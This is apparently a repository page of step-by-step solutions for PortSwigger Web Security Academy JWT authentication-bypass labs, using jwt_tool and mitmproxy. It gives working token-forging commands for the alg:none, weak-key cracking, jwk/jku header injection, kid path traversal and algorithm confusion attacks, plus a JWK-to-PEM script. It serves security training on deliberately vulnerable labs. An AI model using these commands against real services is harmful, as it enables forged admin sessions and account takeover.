-
Notifications
You must be signed in to change notification settings - Fork 0
JWT
Apprentice lab:
JWT authentication bypass via unverified signature
Apprentice lab:
JWT authentication bypass via unverified signature
This lab uses a JWT-based mechanism for handling sessions. Due to implementation flaws, the server doesn't verify the signature of any JWTs that it receives.
To solve the lab, modify your session token to gain access to the admin panel at /admin
, then delete the user carlos
.
You can log in to your own account using the following credentials: wiener:peter
-
Solution
- Log in as
wiener:peter
. - Notice in the requests the cookie is a JWT token.
- Try accessing
/admin
, export (x4
) the request. - Run
jwt_tool
.Observe the decoded token values.jwt_tool.py -r request.txt
- Run the following.
jwt_tool.py -r request.txt -I -pc sub -pv administrator -v
- Go back to mitmproxy, observer the request that was sent using jwt_tool. Copy the cookie value and paste it to browser.
- Access
/admin
panel and delete Carlilto.
- Log in as
Apprentice lab:
JWT authentication bypass via flawed signature verification
Apprentice lab:
JWT authentication bypass via flawed signature verification
This lab uses a JWT-based mechanism for handling sessions. The server is insecurely configured to accept unsigned JWTs.
To solve the lab, modify your session token to gain access to the admin panel at /admin
, then delete the user carlos.
You can log in to your own account using the following credentials: wiener:peter
-
Solution
- Log in as
wiener:peter
. - Notice in the requests the cookie is a JWT token.
- Try accessing
/admin
, export (x4
) the request. - Run
jwt_tool
.Observe the decoded token values.jwt_tool.py -r request.txt
- Run the following.
alg:none exploit option was chosen.
jwt_tool.py -r request.txt -I -pc sub -pv administrator -v -X a
- Go back to mitmproxy, observer the request that was sent using jwt_tool. Copy the cookie value and paste it to browser.
- Access
/admin
panel and delete Carlilto.
- Log in as
Practitioner lab:
JWT authentication bypass via weak signing key
Practitioner lab:
JWT authentication bypass via weak signing key
This lab uses a JWT-based mechanism for handling sessions. It uses an extremely weak secret key to both sign and verify tokens. This can be easily brute-forced using a wordlist of common secrets.
To solve the lab, first brute-force the website's secret key. Once you've obtained this, use it to sign a modified session token that gives you access to the admin panel at /admin
, then delete the user carlos
.
You can log in to your own account using the following credentials: wiener:peter
-
Solution
- Log in as
wiener:peter
. - Notice in the requests the cookie is a JWT token.
- Try accessing
/admin
, export (x4
) the request. - Run
jwt_tool
.Observe the decoded token values.jwt_tool.py -r request.txt
- Since there is no signature we have to make one and use a dictionary to crack it.
jwt_tool.py -r request.txt -C -d jwt.secrets.list
- Once the correct key is found use it to make a request.
jwt_tool.py -r request.txt -S hs256 -p "secret1" -I -pc sub -pv administrator -v
- Go back to mitmproxy, observer the request that was sent using jwt_tool. Copy the cookie value and paste it to browser.
- Access
/admin
panel and delete Carlilto.
- Log in as
Practitioner lab:
JWT authentication bypass via jwk header injection
Practitioner lab:
JWT authentication bypass via jwk header injection
This lab uses a JWT-based mechanism for handling sessions. The server supports the jwk
parameter in the JWT header. This is sometimes used to embed the correct verification key directly in the token. However, it fails to check whether the provided key came from a trusted source.
To solve the lab, modify and sign a JWT that gives you access to the admin panel at /admin
, then delete the user carlos
.
You can log in to your own account using the following credentials: wiener:peter
-
Solution
- Log in as
wiener:peter
. - Notice in the requests the cookie is a JWT token.
- Try accessing
/admin
, export (x4
) the request. - Run
jwt_tool
.Observe the decoded token values.jwt_tool.py -r request.txt
- After some futile attempts one should examine the JWT closer at jwt.io.
- Change
sub
andkid
to proper values.jwt_tool.py -r request.txt -I -pc sub -pv administrator -hc kid -hv jwt_tool -v -X i
- Go back to mitmproxy, observer the request that was sent using jwt_tool. Copy the cookie value and paste it to browser.
- Access
/admin
panel and delete Carlilto.
- Log in as
Practitioner lab:
JWT authentication bypass via jku header injection
Practitioner lab:
JWT authentication bypass via jku header injection
This lab uses a JWT-based mechanism for handling sessions. The server supports the jku
parameter in the JWT header. However, it fails to check whether the provided URL belongs to a trusted domain before fetching the key.
To solve the lab, forge a JWT that gives you access to the admin panel at /admin, then delete the user carlos
.
You can log in to your own account using the following credentials: wiener:peter
-
Solution
- Log in as
wiener:peter
. - Notice in the requests the cookie is a JWT token.
- Try accessing
/admin
, export (x4
) the request. - Run
jwt_tool
.Observe the decoded token values.jwt_tool.py -r request.txt
- Run
jwt_tool.py -r request.txt -I -pc sub -pv administrator -X s -ju 'https://exploit-0a030096036f1a8c824b2a09019700d6.exploit-server.net/jwk.json' -v -hc kid -hv 'jwt_tool'
- Go to exploit server and paste the JWKS to the exploit server. Also change the Content-Type from text/html to application/json.
- Run the last command again and go delete carlos.
- Log in as
Practitioner lab:
JWT authentication bypass via kid header path traversal
Practitioner lab:
JWT authentication bypass via kid header path traversal
This lab uses a JWT-based mechanism for handling sessions. In order to verify the signature, the server uses the kid
parameter in JWT header to fetch the relevant key from its filesystem.
To solve the lab, forge a JWT that gives you access to the admin panel at /admin
, then delete the user carlos
.
You can log in to your own account using the following credentials: wiener:peter
-
Solution
- Log in as
wiener:peter
. - Notice in the requests the cookie is a JWT token.
- Try accessing
/admin
, export (x4
) the request. - Run
jwt_tool
.Observe the decoded token values.jwt_tool.py -r request.txt
- After some futile attempts one should examine the JWT closer at jwt.io.
- Change
sub
andkid
to proper values.jwt_tool.py -r request.txt -I -hc kid -hv '../../../dev/null' -pc sub -pv administrator -S hs256 -v
- Go back to mitmproxy, observer the request that was sent using jwt_tool. Copy the cookie value and paste it to browser.
- Access
/admin
panel and delete Carlilto.
- Log in as
Expert lab:
JWT authentication bypass via algorithm confusion
Expert lab:
JWT authentication bypass via algorithm confusion
This lab uses a JWT-based mechanism for handling sessions. It uses a robust RSA key pair to sign and verify tokens. However, due to implementation flaws, this mechanism is vulnerable to algorithm confusion attacks.
To solve the lab, first obtain the server's public key. This is exposed via a standard endpoint. Use this key to sign a modified session token that gives you access to the admin panel at /admin
, then delete the user carlos
.
You can log in to your own account using the following credentials: wiener:peter
-
Solution
- Log in as
wiener:peter
. - Notice in the requests the cookie is a JWT token.
- Try accessing
/admin
, export (x4
) the request. - Run
jwt_tool
.Observe the decoded token values.jwt_tool.py -r request.txt
- Check, endpoint
/jkws.json
exist. It can be found, through discovery. - Copy the key into this python script
import json from base64 import urlsafe_b64decode from cryptography.hazmat.primitives.asymmetric import rsa from cryptography.hazmat.primitives import serialization # The (example) JWK as a Python dictionary jwk = { "kty": "RSA", "e": "AQAB", "use": "sig", "kid": "ef2c48bd-a5b6-44ad-8b60-d2bb9122c63b", "alg": "RS256", "n": "qxloGb-h6NW7L_LYobar3OgQPf1-VjC2Bt-CdErDLKH5Jo0pJLtVfrwBRNzIdeRb7nnPatb4j0fOxmEept-CV6ihajcoRXNNabwSX7HkGAgTNFYebjnEzkv8Cr3lJVneVQTE5AYI85wo4q8ySjFeA-E0I3rE5gdPLzdra__TnMSgmEbwt3Ib3eFmR-bBSlKq3dGny-KC1vvrNykjloPBTMGv5O5AORJGaplRdV-ojpzMZGvYN-no1LN4cx4mj8kzXOvMcwhpM1XEqLnkRxfjCAVuiZmDNVcBqafrlQf4iEYY0LapR3aTMNzNH_0Vd-huIrXl_5kih4vS4xXhS60gZQ" } # Decode the modulus and exponent n = int.from_bytes(urlsafe_b64decode(jwk['n'] + '=='), byteorder='big') e = int.from_bytes(urlsafe_b64decode(jwk['e'] + '=='), byteorder='big') # Create the public key public_key = rsa.RSAPublicNumbers(e, n).public_key() # Serialize the public key to PEM format pem = public_key.public_bytes( encoding=serialization.Encoding.PEM, format=serialization.PublicFormat.SubjectPublicKeyInfo ) # Write the PEM to a file with open('public.pem', 'wb') as f: f.write(pem) print("Public key has been saved to 'public.pem'") ```
- Run
jwt_tool
jwt_tool.py -r request.txt -I -pc sub -pv administrator -X k -pk public.pem -v
- Go back to mitmproxy, observer the request that was sent using jwt_tool. Copy the cookie value and paste it to browser.
- Access
/admin
panel and delete Carlilto.
- Log in as
Expert lab:
JWT authentication bypass via algorithm confusion with no exposed key
Expert lab:
JWT authentication bypass via algorithm confusion with no exposed key
This lab uses a JWT-based mechanism for handling sessions. It uses a robust RSA key pair to sign and verify tokens. However, due to implementation flaws, this mechanism is vulnerable to algorithm confusion attacks.
To solve the lab, first obtain the server's public key. Use this key to sign a modified session token that gives you access to the admin panel at /admin
, then delete the user carlos
.
You can log in to your own account using the following credentials: wiener:peter
-
Solution
- Log in as
wiener:peter
, copy JWT and log out. Repeat. - Run
docker run --rm -it portswigger/sig2n <token1> <token2>
- Try out keys, when correct one is found, run:
echo -n 'token' | base64 -d > public.pem
- Finally try an RSA Key Confusion Exploit
jwt_tool.py -r request.txt -I -pc sub -pv administrator -X k -pk public.pem -v
- Log in as
Solutions for the Portswigger's Web Security Academy using mitmproxy and other cli tools instead of Burp Suite
Server-side topics:
- SQL injection
- Authentication
- File path traversal
- OS command injection
- Business logic vulnerabilities
- Information disclosure
- Access control vulnerabilities
- File upload vulnerabilities
- Race conditions
- Server-side request forgery (SSRF)
- XML external entity (XXE) injection
- NoSQL injection
- API testing
Client-side topics:
- Cross-site scripting (XSS)
- Cross-site request forgery (CSRF)
- Cross-origin resource sharing (CORS)
- Clickjacking
- DOM-based vulnerabilities
- WebSockets
Advanced topics: